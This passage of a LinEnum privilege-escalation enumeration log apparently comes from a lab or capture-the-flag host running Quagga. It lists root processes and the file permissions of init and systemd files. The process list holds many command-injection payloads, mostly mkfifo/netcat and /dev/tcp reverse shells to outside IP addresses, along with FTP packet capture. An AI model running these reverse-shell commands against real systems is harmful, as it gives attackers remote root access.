535. root 3918 0.0 0.3 92796 6632 ? Ss 21:32 0:00 sshd: root@notty
536. root 3948 0.0 0.1 11232 2116 ? Ss 21:32 0:00 bash -c ps waux | grep root$(bash -i >& /dev/tcp/10.10.12.58/2222 0>&1) | grep -v grep
537. root 3950 0.0 0.0 11232 192 ? S 21:32 0:00 bash -c ps waux | grep root$(bash -i >& /dev/tcp/10.10.12.58/2222 0>&1) | grep -v grep
538. root 3951 0.0 0.0 12944 972 ? S 21:32 0:00 grep -v grep
539. root 3952 0.0 0.0 11232 1216 ? S 21:32 0:00 bash -c ps waux | grep root$(bash -i >& /dev/tcp/10.10.12.58/2222 0>&1) | grep -v grep
540. root 3953 0.0 0.1 19896 2864 ? S 21:32 0:00 bash -i
541. root 4144 0.0 0.3 92796 6844 ? Ss 21:50 0:00 sshd: root@notty
542. root 4174 0.0 0.1 11236 2184 ? Ss 21:50 0:00 bash -c ps waux | grep root; ls; rm /tmp/zz;mkfifo /tmp/zz;cat /tmp/zz|/bin/sh -i 2>&1|netcat 10.10.15.171 1000 ???\?ޞ????ܙ\??]??ܙ\? | grep -v grep
543. root 4180 0.0 0.0 6028 676 ? S 21:50 0:00 cat /tmp/zz
544. root 4181 0.0 0.0 4504 796 ? S 21:50 0:00 /bin/sh -i
545. root 4302 0.0 0.3 92796 6680 ? Ss 21:59 0:00 sshd: root@notty
546. root 4332 0.0 0.1 11236 2272 ? Ss 21:59 0:00 bash -c ps waux | grep root ; rm /tmp/yy; mkfifo /tmp/yy; cat /tmp/yy | /bin/sh -i 2>&1 | nc 10.10.15.171 1001 > /tmp/yy | grep -v grep | grep -v grep
547. root 4338 0.0 0.0 4504 744 ? S 21:59 0:00 /bin/sh -i
548. root 4415 0.0 0.1 55652 3876 ? S 22:01 0:00 sudo tcpdump -A port ftp -i eth2
549. root 4416 0.0 0.3 24272 6104 ? S 22:01 0:00 tcpdump -A port ftp -i eth2
550. root 4451 0.0 0.3 92796 6772 ? Ss 22:02 0:00 sshd: root@notty
551. root 4481 0.0 0.1 11236 2076 ? Ss 22:02 0:00 bash -c ps waux | grep root ; rm /tmp/yy; mkfifo /tmp/yy; cat /tmp/yy | /bin/sh -i 2>&1 | nc 10.10.15.171 1001 > /tmp/yy | grep -v grep?l | grep -v grep
552. root 4486 0.0 0.0 6164 672 ? S 22:02 0:00 cat /tmp/yy
553. root 4487 0.0 0.0 4504 852 ? S 22:02 0:00 /bin/sh -i
554. root 4488 0.0 0.0 11300 1724 ? S 22:02 0:00 nc 10.10.15.171 1001
555. root 4493 0.0 0.1 55652 3944 ? S 22:03 0:00 sudo tcpdump -A port ftp -i eth2 -w out.pcap
556. root 4494 0.0 0.2 20040 5820 ? S 22:03 0:00 tcpdump -A port ftp -i eth2 -w out.pcap
557. root 4495 0.0 0.3 92796 6928 ? Ss 22:04 0:00 sshd: root@notty
558. root 4525 0.0 0.1 11236 2276 ? Ss 22:04 0:00 bash -c ps waux | grep root ; rm /tmp/yy; mkfifo /tmp/yy; cat /tmp/yy | /bin/sh -i 2>&1 | nc 10.10.15.171 1001 > /tmp/yy | grep -v grep?l | grep -v grep
559. root 4530 0.0 0.0 6164 724 ? S 22:04 0:00 cat /tmp/yy
560. root 4531 0.0 0.0 4504 1628 ? S 22:04 0:00 /bin/sh -i
561. root 4532 0.0 0.0 11300 1596 ? S 22:04 0:00 nc 10.10.15.171 1001
562. root 5171 0.0 0.3 92796 6692 ? Ss 22:16 0:00 sshd: root@notty
563. root 5201 0.0 0.1 11236 2056 ? Ss 22:16 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.233 4445 ???\?? | grep -v grep
564. root 5206 0.0 0.0 6028 720 ? S 22:16 0:00 cat /tmp/f
565. root 5207 0.0 0.0 4504 736 ? S 22:16 0:00 /bin/sh -i
566. root 5247 0.0 0.3 92796 6808 ? Ss 22:17 0:00 sshd: root@notty
567. root 5277 0.0 0.1 11236 2192 ? Ss 22:17 0:00 bash -c ps waux | grep quagga&&rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.15.100 1234 >/tmp/f | grep -v grep
568. root 5282 0.0 0.0 6164 672 ? S 22:17 0:00 cat /tmp/f
569. root 5283 0.0 0.1 19896 2772 ? S 22:17 0:00 /bin/bash -i
570. root 5284 0.0 0.0 11300 1732 ? S 22:17 0:00 nc 10.10.15.100 1234
571. root 5299 0.0 0.3 92796 6728 ? Ss 22:17 0:00 sshd: root@notty
572. root 5329 0.0 0.1 11236 2176 ? Ss 22:17 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.233 4445 ???\?? | grep -v grep
573. root 5334 0.0 0.0 6028 768 ? S 22:17 0:00 cat /tmp/f
574. root 5335 0.0 0.0 4504 840 ? S 22:17 0:00 /bin/sh -i
575. root 5338 0.0 0.4 37496 8852 ? S 22:18 0:00 python3 -c import pty;pty.spawn("/bin/bash")
576. root 5339 0.0 0.1 19880 3588 pts/0 Ss+ 22:18 0:00 /bin/bash
577. root 5354 0.0 0.3 92796 6732 ? Ss 22:20 0:00 sshd: root@notty
578. root 5384 0.0 0.1 11236 2192 ? Ss 22:20 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.233 4446 ???\?? | grep -v grep
579. root 5389 0.0 0.0 6028 828 ? S 22:20 0:00 cat /tmp/f
580. root 5390 0.0 0.0 4504 744 ? S 22:20 0:00 /bin/sh -i
581. root 5394 0.0 0.3 92796 6920 ? Ss 22:20 0:00 sshd: root@notty
582. root 5424 0.0 0.1 11236 2200 ? Ss 22:20 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.233 4446 ???\?? | grep -v grep
583. root 5429 0.0 0.0 6028 692 ? S 22:20 0:00 cat /tmp/f
584. root 5430 0.0 0.0 4504 852 ? S 22:20 0:00 /bin/sh -i
585. root 5433 0.0 0.3 92796 6784 ? Ss 22:22 0:00 sshd: root@notty
586. root 5463 0.0 0.1 11236 2200 ? Ss 22:22 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.233 4446 ???\?? | grep -v grep
587. root 5468 0.0 0.0 6028 676 ? S 22:22 0:00 cat /tmp/f
588. root 5469 0.0 0.0 4504 744 ? S 22:22 0:00 /bin/sh -i
589. root 5647 0.0 0.3 92796 6860 ? Ss 22:28 0:00 sshd: root@notty
590. root 5677 0.0 0.1 11236 2080 ? Ss 22:28 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.233 4447 ???\?? | grep -v grep
591. root 5682 0.0 0.0 6028 668 ? S 22:28 0:00 cat /tmp/f
592. root 5683 0.0 0.0 4504 672 ? S 22:28 0:00 /bin/sh -i
593. root 5689 0.0 0.3 92796 6860 ? Ss 22:31 0:00 sshd: root@notty
594. root 5719 0.0 0.1 11236 2196 ? Ss 22:31 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.233 9000 ???\?? | grep -v grep
595. root 5724 0.0 0.0 6028 720 ? S 22:31 0:00 cat /tmp/f
596. root 5725 0.0 0.0 4504 780 ? S 22:31 0:00 /bin/sh -i
597. root 5728 0.0 0.3 92796 6784 ? Ss 22:32 0:00 sshd: root@notty
598. root 5758 0.0 0.1 11236 2052 ? Ss 22:32 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.233 9000 ???\?? | grep -v grep
599. root 5763 0.0 0.0 6028 668 ? S 22:32 0:00 cat /tmp/f
600. root 5764 0.0 0.0 4504 844 ? S 22:32 0:00 /bin/sh -i
601. root 5869 0.0 0.3 92796 6764 ? Ss 22:34 0:00 sshd: root@notty
602. root 5899 0.0 0.1 11236 2280 ? Ss 22:34 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.233 9000 ???\?? | grep -v grep
603. root 5904 0.0 0.0 6028 816 ? S 22:34 0:00 cat /tmp/f
604. root 5905 0.0 0.0 4504 744 ? S 22:34 0:00 /bin/sh -i
605. root 5908 0.0 0.3 92796 6964 ? Ss 22:35 0:00 sshd: root@notty
606. root 5938 0.0 0.1 11236 2204 ? Ss 22:35 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -u 10.10.15.233 9000 ???\?? | grep -v grep
607. root 5943 0.0 0.0 6028 692 ? S 22:35 0:00 cat /tmp/f
608. root 5944 0.0 0.0 4504 848 ? S 22:35 0:00 /bin/sh -i
609. root 5945 99.1 0.0 11300 1584 ? R 22:35 32:32 nc -u 10.10.15.233 9000 ?????
610. root 5946 0.0 0.0 12944 1092 ? S 22:35 0:00 grep -v grep
611. root 5947 0.0 0.3 92796 6720 ? Ss 22:35 0:00 sshd: root@notty
612. root 5977 0.0 0.1 11236 2080 ? Ss 22:35 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -u 10.10.15.233 9000 ???\?? | grep -v grep
613. root 5982 0.0 0.0 6028 720 ? S 22:35 0:00 cat /tmp/f
614. root 5983 0.0 0.0 4504 656 ? S 22:35 0:00 /bin/sh -i
615. root 5984 0.0 0.0 11300 1716 ? S 22:35 0:00 nc -u 10.10.15.233 9000 ?????
616. root 5985 0.0 0.0 12944 1020 ? S 22:35 0:00 grep -v grep
617. root 6063 0.0 0.2 20040 5772 ? S 22:40 0:00 tcpdump -A port ftp -i eth2 -w out.pcap
618. root 6064 0.0 0.3 92796 6768 ? Ss 22:41 0:00 sshd: root@notty
619. root 6094 0.0 0.1 11236 2116 ? Ss 22:41 0:00 bash -c ps waux | grep root ; rm /tmp/yy; mkfifo /tmp/yy; cat /tmp/yy | /bin/sh -i 2>&1 | nc 10.10.15.171 1001 > /tmp/yy | grep -v grep?l | grep -v grep
620. root 6100 0.0 0.0 4504 776 ? S 22:41 0:00 /bin/sh -i
621. root 6106 0.0 0.2 20040 5764 ? S 22:46 0:00 tcpdump -A port ftp -i eth2 -w out.pcap -b
622. root 6177 0.0 0.3 92796 6856 ? Ss 22:48 0:00 sshd: root@notty
623. root 6207 0.0 0.1 11236 2020 ? Ss 22:48 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -u 10.10.15.233 9000 ???\?? | grep -v grep
624. root 6212 0.0 0.0 6028 688 ? S 22:48 0:00 cat /tmp/f
625. root 6213 0.0 0.0 4504 796 ? S 22:48 0:00 /bin/sh -i
626. root 6214 99.2 0.0 11300 1708 ? R 22:48 19:38 nc -u 10.10.15.233 9000 ?????
627. root 6215 0.0 0.0 12944 1028 ? S 22:48 0:00 grep -v grep
628. root 6216 0.0 0.3 92796 6876 ? Ss 22:48 0:00 sshd: root@notty
629. root 6246 0.0 0.1 11236 2180 ? Ss 22:48 0:00 bash -c ps waux | grep ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.233 9000 ???\?? | grep -v grep
630. root 6251 0.0 0.0 6028 692 ? S 22:48 0:00 cat /tmp/f
631. root 6252 0.0 0.0 4504 700 ? S 22:48 0:00 /bin/sh -i
632. root 6258 0.0 0.3 92796 6684 ? Ss 22:51 0:00 sshd: root@notty
633. root 6288 0.0 0.1 11236 2284 ? Ss 22:51 0:00 bash -c ps waux | grep root ; rm /tmp/ww; mkfifo /tmp/ww; cat /tmp/ww | /bin/sh -i 2>&1 | nc 10.10.15.171 1002 > /tmp/22 | grep -v grep | grep -v grep
634. root 6293 0.0 0.0 6028 824 ? S 22:51 0:00 cat /tmp/ww
635. root 6294 0.0 0.0 4504 784 ? S 22:51 0:00 /bin/sh -i
636. root 6334 0.0 0.3 92796 6872 ? Ss 22:55 0:00 sshd: root@notty
637. root 6364 0.0 0.1 11236 2200 ? Ss 22:55 0:00 bash -c ps waux | grep root ; rm /tmp/ww; mkfifo /tmp/ww; cat /tmp/ww | /bin/sh -i 2>&1 | nc 10.10.15.171 1002 > /tmp/22 | grep -v grep | grep -v grep
638. root 6369 0.0 0.0 6028 684 ? S 22:55 0:00 cat /tmp/ww
639. root 6370 0.0 0.0 4504 752 ? S 22:55 0:00 /bin/sh -i
640. root 6451 0.0 0.3 92796 6772 ? Ss 22:57 0:00 sshd: root@notty
641. root 6481 0.0 0.1 11236 2196 ? Ss 22:57 0:00 bash -c ps waux | grep root ; rm /tmp/ww; mkfifo /tmp/ww; cat /tmp/ww | /bin/sh -i 2>&1 | nc 10.10.15.171 1002 > /tmp/22 | grep -v grep | grep -v grep
642. root 6486 0.0 0.0 6028 672 ? S 22:57 0:00 cat /tmp/ww
643. root 6487 0.0 0.0 4504 704 ? S 22:57 0:00 /bin/sh -i
644. root 6496 0.0 0.3 92796 6728 ? Ss 22:58 0:00 sshd: root@notty
645. root 6526 0.0 0.1 11236 2280 ? Ss 22:58 0:00 bash -c ps waux | grep root ; rm /tmp/w; mkfifo /tmp/w; cat /tmp/w | /bin/sh -i 2>&1 | nc 10.10.15.171 1002 > /tmp/w | grep -v grep | grep -v grep
646. root 6531 0.0 0.0 6164 676 ? S 22:58 0:00 cat /tmp/w
647. root 6532 0.0 0.0 4504 756 ? S 22:58 0:00 /bin/sh -i
648. root 6533 0.0 0.0 11300 1724 ? S 22:58 0:00 nc 10.10.15.171 1002
649. root 6540 0.0 0.3 92796 6932 ? Ss 22:59 0:00 sshd: root@notty
650. root 6571 0.0 0.1 11236 2264 ? Ss 22:59 0:00 bash -c ps waux | grep root ; rm /tmp/yy; mkfifo /tmp/yy; cat /tmp/yy | /bin/sh -i 2>&1 | nc 10.10.15.171 1001 > /tmp/yy | grep -v grep?l | grep -v grep
651. root 6577 0.0 0.0 4504 708 ? S 22:59 0:00 /bin/sh -i
652. root 6666 0.0 0.2 20040 5816 ? S 23:01 0:00 tcpdump -A port ftp -i eth2 -w out.pcap -b
653. root 6709 0.0 0.3 92796 6772 ? Ss 23:04 0:00 sshd: root@notty
654. root 6745 0.0 0.1 11236 2892 ? Ss 23:04 0:00 bash -c ps waux | grep root ; rm /tmp/yy; mkfifo /tmp/yy; cat /tmp/yy | /bin/sh -i 2>&1 | nc 10.10.15.171 1001 > /tmp/yy | grep -v grep?l | grep -v grep
655. root 6750 0.0 0.0 6164 696 ? S 23:04 0:00 cat /tmp/yy
656. root 6751 0.0 0.0 4504 752 ? S 23:04 0:00 /bin/sh -i
657. root 6752 0.0 0.0 11300 1824 ? S 23:04 0:00 nc 10.10.15.171 1001
658. quagga 6824 0.0 0.0 24500 1824 ? Ss 23:05 0:00 /usr/lib/quagga/zebra --daemon -A 127.0.0.1
659. quagga 6828 0.0 0.1 29448 2788 ? Ss 23:05 0:00 /usr/lib/quagga/bgpd --daemon -A 127.0.0.1
660. root 6833 0.0 0.0 15432 164 ? Ss 23:05 0:00 /usr/lib/quagga/watchquagga --daemon zebra bgpd
661. root 7124 0.0 0.2 20040 5808 ? S 23:06 0:00 tcpdump -A port ftp -i eth2 -w out.pcap -b
662. root 7141 0.0 0.3 92796 6896 ? Ss 23:07 0:00 sshd: root@notty
663. root 7171 0.0 0.1 11232 3076 ? Ss 23:07 0:00 bash -c ps waux | grep ; ./shell.sh | grep -v grep
664. root 7174 0.0 0.1 11260 2320 ? S 23:07 0:00 bash -c ps waux | grep ; ./shell.sh | grep -v grep
665. root 7175 0.0 0.0 12944 1016 ? S 23:07 0:00 grep -v grep
666. root 7176 0.0 0.0 4504 788 ? S 23:07 0:00 sh
667. root 7178 0.0 0.0 4504 744 ? S 23:07 0:00 /bin/sh -i
668. root 7179 0.5 0.4 52340 8168 ? S 23:07 0:00 vi
669. root 7180 0.0 0.1 11228 3028 ? S 23:08 0:00 bash
670. root 7182 0.0 0.0 4504 784 ? S 23:08 0:00 /bin/sh -i
671. root 7217 0.0 0.1 12216 4016 ? S 23:08 0:00 /bin/bash ./LinEnum.sh detailed
672. root 7218 0.0 0.1 12352 3652 ? S 23:08 0:00 /bin/bash ./LinEnum.sh detailed
673. root 7219 0.0 0.0 6012 672 ? S 23:08 0:00 tee -a
674. root 7423 0.0 0.1 12320 2968 ? S 23:08 0:00 /bin/bash ./LinEnum.sh detailed
675. root 7424 0.0 0.1 36084 3392 ? R 23:08 0:00 ps aux
676.  
677.  
678. [-] Process binaries and associated permissions (from above list):
679. -rwxr-xr-x 1 root root 1037528 May 16 2017 /bin/bash
680. lrwxrwxrwx 1 root root 4 Feb 17 2016 /bin/sh -> dash
681. -rwxr-xr-x 1 root root 1577232 Mar 8 2018 /lib/systemd/systemd
682. -rwxr-xr-x 1 root root 326224 Mar 8 2018 /lib/systemd/systemd-journald
683. -rwxr-xr-x 1 root root 618520 Mar 8 2018 /lib/systemd/systemd-logind
684. -rwxr-xr-x 1 root root 453240 Mar 8 2018 /lib/systemd/systemd-udevd
685. -rwxr-xr-x 1 root root 44104 Nov 30 2017 /sbin/agetty
686. lrwxrwxrwx 1 root root 20 Mar 8 2018 /sbin/init -> /lib/systemd/systemd
687. -rwxr-xr-x 1 root root 783984 Jul 26 2017 /sbin/iscsid
688. -rwxr-xr-x 1 root root 224208 Jan 12 2017 /usr/bin/dbus-daemon
689. -rwxr-xr-x 1 root root 164928 Nov 3 2016 /usr/lib/accountsservice/accounts-daemon
690. -rwxr-xr-x 1 root root 15048 Jan 17 2016 /usr/lib/policykit-1/polkitd
691. -rwxr-xr-x 1 root root 934976 Feb 8 2018 /usr/lib/quagga/bgpd
692. -rwxr-xr-x 1 root root 35168 Feb 8 2018 /usr/lib/quagga/watchquagga
693. -rwxr-xr-x 1 root root 270224 Feb 8 2018 /usr/lib/quagga/zebra
694. -rwxr-xr-x 1 root root 22658024 May 17 2018 /usr/lib/snapd/snapd
695. -rwxr-xr-x 1 root root 26632 Jan 14 2016 /usr/sbin/atd
696. -rwxr-xr-x 1 root root 44472 Apr 5 2016 /usr/sbin/cron
697. -rwxr-xr-x 1 root root 791024 Jan 18 2018 /usr/sbin/sshd
698.  
699.  
700. [-] /etc/init.d/ binary permissions:
701. total 304
702. drwxr-xr-x 1 root root 1212 Jul 1 2018 .
703. drwxr-xr-x 1 root root 2988 Jan 7 21:14 ..
704. -rwxr-xr-x 1 root root 2243 Feb 9 2016 acpid
705. -rwxr-xr-x 1 root root 6223 Mar 3 2017 apparmor
706. -rwxr-xr-x 1 root root 2802 May 24 2018 apport
707. -rwxr-xr-x 1 root root 1071 Dec 6 2015 atd
708. -rwxr-xr-x 1 root root 1275 Jan 19 2016 bootmisc.sh
709. -rwxr-xr-x 1 root root 3807 Jan 19 2016 checkfs.sh
710. -rwxr-xr-x 1 root root 1098 Jan 19 2016 checkroot-bootclean.sh
711. -rwxr-xr-x 1 root root 9353 Jan 19 2016 checkroot.sh
712. -rwxr-xr-x 1 root root 1343 Apr 4 2016 console-setup
713. -rwxr-xr-x 1 root root 3049 Apr 5 2016 cron
714. -rwxr-xr-x 1 root root 937 Mar 28 2015 cryptdisks
715. -rwxr-xr-x 1 root root 896 Mar 28 2015 cryptdisks-early
716. -rwxr-xr-x 1 root root 2813 Dec 2 2015 dbus
717. -rw-r--r-- 1 root root 1264 Jul 2 2018 .depend.boot
718. -rw-r--r-- 1 root root 668 Jul 2 2018 .depend.start
719. -rw-r--r-- 1 root root 1061 Jul 2 2018 .depend.stop
720. -rwxr-xr-x 1 root root 1336 Jan 19 2016 halt
721. -rwxr-xr-x 1 root root 1423 Jan 19 2016 hostname.sh
722. -rwxr-xr-x 1 root root 3809 Mar 12 2016 hwclock.sh
723. -rwxr-xr-x 1 root root 2372 Apr 11 2016 irqbalance
724. -rwxr-xr-x 1 root root 1503 Mar 29 2016 iscsid
725. -rwxr-xr-x 1 root root 1804 Apr 4 2016 keyboard-setup
726. -rwxr-xr-x 1 root root 1300 Jan 19 2016 killprocs
727. -rwxr-xr-x 1 root root 2087 Dec 20 2015 kmod
728. -rwxr-xr-x 1 root root 695 Oct 30 2015 lvm2
729. -rwxr-xr-x 1 root root 571 Oct 30 2015 lvm2-lvmetad
730. -rwxr-xr-x 1 root root 586 Oct 30 2015 lvm2-lvmpolld
731. -rwxr-xr-x 1 root root 2378 Nov 9 2017 lxcfs
732. -rwxr-xr-x 1 root root 2541 Dec 7 2017 lxd
733. -rwxr-xr-x 1 root root 2365 Oct 9 2017 mdadm
734. -rwxr-xr-x 1 root root 1199 Jul 16 2014 mdadm-waitidle
735. -rwxr-xr-x 1 root root 703 Jan 19 2016 mountall-bootclean.sh
736. -rwxr-xr-x 1 root root 2301 Jan 19 2016 mountall.sh
737. -rwxr-xr-x 1 root root 1461 Jan 19 2016 mountdevsubfs.sh
738. -rwxr-xr-x 1 root root 1564 Jan 19 2016 mountkernfs.sh
739. -rwxr-xr-x 1 root root 711 Jan 19 2016 mountnfs-bootclean.sh
740. -rwxr-xr-x 1 root root 2456 Jan 19 2016 mountnfs.sh
741. -rwxr-xr-x 1 root root 4771 Jul 19 2015 networking
742. -rwxr-xr-x 1 root root 1581 Oct 16 2015 ondemand
743. -rwxr-xr-x 1 root root 2503 Mar 29 2016 open-iscsi
744. -rwxr-xr-x 1 root root 1846 Mar 22 2018 open-vm-tools
745. -rwxr-xr-x 1 root root 1366 Nov 15 2015 plymouth
746. -rwxr-xr-x 1 root root 752 Nov 15 2015 plymouth-log
747. -rwxr-xr-x 1 root root 1192 Sep 6 2015 procps
748. -rwxr-xr-x 1 root root 9353 Jan 1 2014 quagga
749. -rwxr-xr-x 1 root root 6366 Jan 19 2016 rc
750. -rwxr-xr-x 1 root root 820 Jan 19 2016 rc.local
751. -rwxr-xr-x 1 root root 117 Jan 19 2016 rcS
752. -rw-r--r-- 1 root root 2427 Jan 19 2016 README
753. -rwxr-xr-x 1 root root 661 Jan 19 2016 reboot
754. -rwxr-xr-x 1 root root 4149 Nov 23 2015 resolvconf
755. -rwxr-xr-x 1 root root 4355 Jul 10 2014 rsync
756. -rwxr-xr-x 1 root root 2796 Feb 3 2016 rsyslog
757. -rwxr-xr-x 1 root root 1226 Jun 9 2015 screen-cleanup
758. -rwxr-xr-x 1 root root 3927 Jan 19 2016 sendsigs
759. -rwxr-xr-x 1 root root 597 Jan 19 2016 single
760. -rw-r--r-- 1 root root 1087 Jan 19 2016 skeleton
761. -rwxr-xr-x 1 root root 4077 Mar 16 2017 ssh
762. -rwxr-xr-x 1 root root 6087 Apr 12 2016 udev
763. -rwxr-xr-x 1 root root 2049 Aug 7 2014 ufw
764. -rwxr-xr-x 1 root root 2737 Jan 19 2016 umountfs
765. -rwxr-xr-x 1 root root 2202 Jan 19 2016 umountnfs.sh
766. -rwxr-xr-x 1 root root 1879 Jan 19 2016 umountroot
767. -rwxr-xr-x 1 root root 1391 Apr 20 2017 unattended-upgrades
768. -rwxr-xr-x 1 root root 3111 Jan 19 2016 urandom
769. -rwxr-xr-x 1 root root 1306 Nov 30 2017 uuidd
770.  
771.  
772. [-] /etc/init/ config file permissions:
773. total 208
774. drwxr-xr-x 1 root root 1626 Jul 2 2018 .
775. drwxr-xr-x 1 root root 2988 Jan 7 21:14 ..
776. -rw-r--r-- 1 root root 338 Apr 8 2016 acpid.conf
777. -rw-r--r-- 1 root root 3709 Mar 3 2017 apparmor.conf
778. -rw-r--r-- 1 root root 1629 May 24 2018 apport.conf
779. -rw-r--r-- 1 root root 236 Apr 3 2018 cloud-config.conf
780. -rw-r--r-- 1 root root 297 Apr 3 2018 cloud-final.conf
781. -rw-r--r-- 1 root root 2556 Apr 3 2018 cloud-init-blocknet.conf
782. -rw-r--r-- 1 root root 202 Apr 3 2018 cloud-init.conf
783. -rw-r--r-- 1 root root 2024 Apr 3 2018 cloud-init-container.conf
784. -rw-r--r-- 1 root root 379 Apr 3 2018 cloud-init-local.conf
785. -rw-r--r-- 1 root root 1908 Apr 3 2018 cloud-init-nonet.conf
786. -rw-r--r-- 1 root root 562 Apr 3 2018 cloud-log-shutdown.conf
787. -rw-r--r-- 1 root root 250 Apr 4 2016 console-font.conf
788. -rw-r--r-- 1 root root 7 Jul 1 2018 console.override
789. -rw-r--r-- 1 root root 509 Apr 4 2016 console-setup.conf
790. -rw-r--r-- 1 root root 297 Apr 5 2016 cron.conf
791. -rw-r--r-- 1 root root 1519 Mar 28 2015 cryptdisks.conf
792. -rw-r--r-- 1 root root 412 Mar 28 2015 cryptdisks-udev.conf
793. -rw-r--r-- 1 root root 482 Sep 1 2015 dbus.conf
794. -rw-r--r-- 1 root root 1247 Jun 1 2015 friendly-recovery.conf
795. -rw-r--r-- 1 root root 284 Jul 23 2013 hostname.conf
796. -rw-r--r-- 1 root root 300 May 21 2014 hostname.sh.conf
797. -rw-r--r-- 1 root root 674 Mar 14 2016 hwclock.conf
798. -rw-r--r-- 1 root root 561 Mar 14 2016 hwclock-save.conf
799. -rw-r--r-- 1 root root 109 Mar 14 2016 hwclock.sh.conf
800. -rw-r--r-- 1 root root 597 Apr 11 2016 irqbalance.conf
801. -rw-r--r-- 1 root root 689 Aug 20 2015 kmod.conf
802. -rw-r--r-- 1 root root 540 Nov 9 2017 lxcfs.conf
803. -rw-r--r-- 1 root root 813 Dec 7 2017 lxd.conf
804. -rw-r--r-- 1 root root 2493 Jun 2 2015 networking.conf
805. -rw-r--r-- 1 root root 933 Jun 2 2015 network-interface.conf
806. -rw-r--r-- 1 root root 530 Jun 2 2015 network-interface-container.conf
807. -rw-r--r-- 1 root root 1756 Jun 2 2015 network-interface-security.conf
808. -rw-r--r-- 1 root root 568 Feb 1 2016 passwd.conf
809. -rw-r--r-- 1 root root 264 May 30 2018 pollinate.conf
810. -rw-r--r-- 1 root root 119 Jun 5 2014 procps.conf
811. -rw-r--r-- 1 root root 363 Jun 5 2014 procps-instance.conf
812. -rw-r--r-- 1 root root 457 Jun 3 2015 resolvconf.conf
813. -rw-r--r-- 1 root root 426 Dec 2 2015 rsyslog.conf
814. -rw-r--r-- 1 root root 7 Jul 2 2018 rsyslog.override
815. -rw-r--r-- 1 root root 230 Apr 4 2016 setvtrgb.conf
816. -rw-r--r-- 1 root root 641 Mar 16 2017 ssh.conf
817. -rw-r--r-- 1 root root 7 Jul 1 2018 tty1.override
818. -rw-r--r-- 1 root root 7 Jul 1 2018 tty2.override
819. -rw-r--r-- 1 root root 7 Jul 1 2018 tty3.override
820. -rw-r--r-- 1 root root 7 Jul 1 2018 tty4.override
821. -rw-r--r-- 1 root root 552 Jun 22 2018 ttyS0.conf
822. -rw-r--r-- 1 root root 337 Apr 12 2016 udev.conf
823. -rw-r--r-- 1 root root 360 Apr 12 2016 udevmonitor.conf
824. -rw-r--r-- 1 root root 352 Apr 12 2016 udevtrigger.conf
825. -rw-r--r-- 1 root root 473 Aug 7 2014 ufw.conf
826. -rw-r--r-- 1 root root 889 Feb 24 2015 ureadahead.conf.disabled
827. -rw-r--r-- 1 root root 683 Feb 24 2015 ureadahead-other.conf
828.  
829.  
830. [-] /lib/systemd/* config file permissions:
831. /lib/systemd/:
832. total 8.2M
833. drwxr-xr-x 1 root root 12K Jun 22 2018 system
834. drwxr-xr-x 1 root root 688 Jun 22 2018 system-generators
835. drwxr-xr-x 1 root root 28 Jun 22 2018 system-shutdown
836. drwxr-xr-x 1 root root 12 Jun 22 2018 system-sleep
837. drwxr-xr-x 1 root root 128 Jun 22 2018 network
838. drwxr-xr-x 1 root root 34 Jun 22 2018 system-preset
839. -rwxr-xr-x 1 root root 443K Mar 8 2018 systemd-udevd
840. -rwxr-xr-x 1 root root 1.6M Mar 8 2018 systemd
841. -rwxr-xr-x 1 root root 47K Mar 8 2018 systemd-binfmt
842. -rwxr-xr-x 1 root root 268K Mar 8 2018 systemd-cgroups-agent
843. -rwxr-xr-x 1 root root 605K Mar 8 2018 systemd-logind
844. -rwxr-xr-x 1 root root 657K Mar 8 2018 systemd-resolved
845. -rwxr-xr-x 1 root root 143K Mar 8 2018 systemd-shutdown
846. -rwxr-xr-x 1 root root 71K Mar 8 2018 systemd-sleep
847. -rwxr-xr-x 1 root root 333K Mar 8 2018 systemd-timedated
848. -rwxr-xr-x 1 root root 15K Mar 8 2018 systemd-ac-power
849. -rwxr-xr-x 1 root root 103K Mar 8 2018 systemd-bootchart
850. -rwxr-xr-x 1 root root 352K Mar 8 2018 systemd-bus-proxyd
851. -rwxr-xr-x 1 root root 91K Mar 8 2018 systemd-cryptsetup
852. -rwxr-xr-x 1 root root 301K Mar 8 2018 systemd-fsck
853. -rwxr-xr-x 1 root root 75K Mar 8 2018 systemd-fsckd
854. -rwxr-xr-x 1 root root 31K Mar 8 2018 systemd-hibernate-resume
855. -rwxr-xr-x 1 root root 332K Mar 8 2018 systemd-hostnamed
856. -rwxr-xr-x 1 root root 340K Mar 8 2018 systemd-localed
857. -rwxr-xr-x 1 root root 51K Mar 8 2018 systemd-modules-load
858. -rwxr-xr-x 1 root root 123K Mar 8 2018 systemd-networkd-wait-online
859. -rwxr-xr-x 1 root root 35K Mar 8 2018 systemd-random-seed
860. -rwxr-xr-x 1 root root 51K Mar 8 2018 systemd-remount-fs
861. -rwxr-xr-x 1 root root 31K Mar 8 2018 systemd-reply-password
862. -rwxr-xr-x 1 root root 91K Mar 8 2018 systemd-socket-proxyd
